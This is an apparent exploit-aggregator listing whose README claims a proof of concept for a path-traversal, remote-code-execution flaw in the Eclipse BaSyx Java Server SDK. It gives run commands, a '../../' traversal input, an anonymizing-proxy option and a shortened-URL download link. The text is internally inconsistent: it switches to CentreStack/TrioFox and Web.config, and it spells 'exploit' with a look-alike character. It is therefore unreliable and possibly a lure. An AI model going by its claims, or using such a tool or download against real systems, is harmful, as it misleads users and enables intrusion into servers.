Share
## https://sploitus.com/exploit?id=FF657D07-1858-54E7-A867-32BD5A5E0B09
# CVE-2026-7411

### Overview
In certain versions of the Eclipse BaSyx Java Server SDK, a vulnerability exists that allows unauthenticated attackers to exploit inadequate path normalization in the Submodel HTTP API. 

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target  --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### How It Works
Attackers can perform a path traversal attack by manipulating the fileName parameter during file uploads. This exploit enables them to bypass storage boundaries, potentially writing arbitrary files to any location within the host filesystem that is accessible by the Java process. Such an attack can result in unauthorized Remote Code Execution (RCE), posing severe risks to system integrity.

### Download PoC explоit [here](https://tinyurl.com/24trxzsb)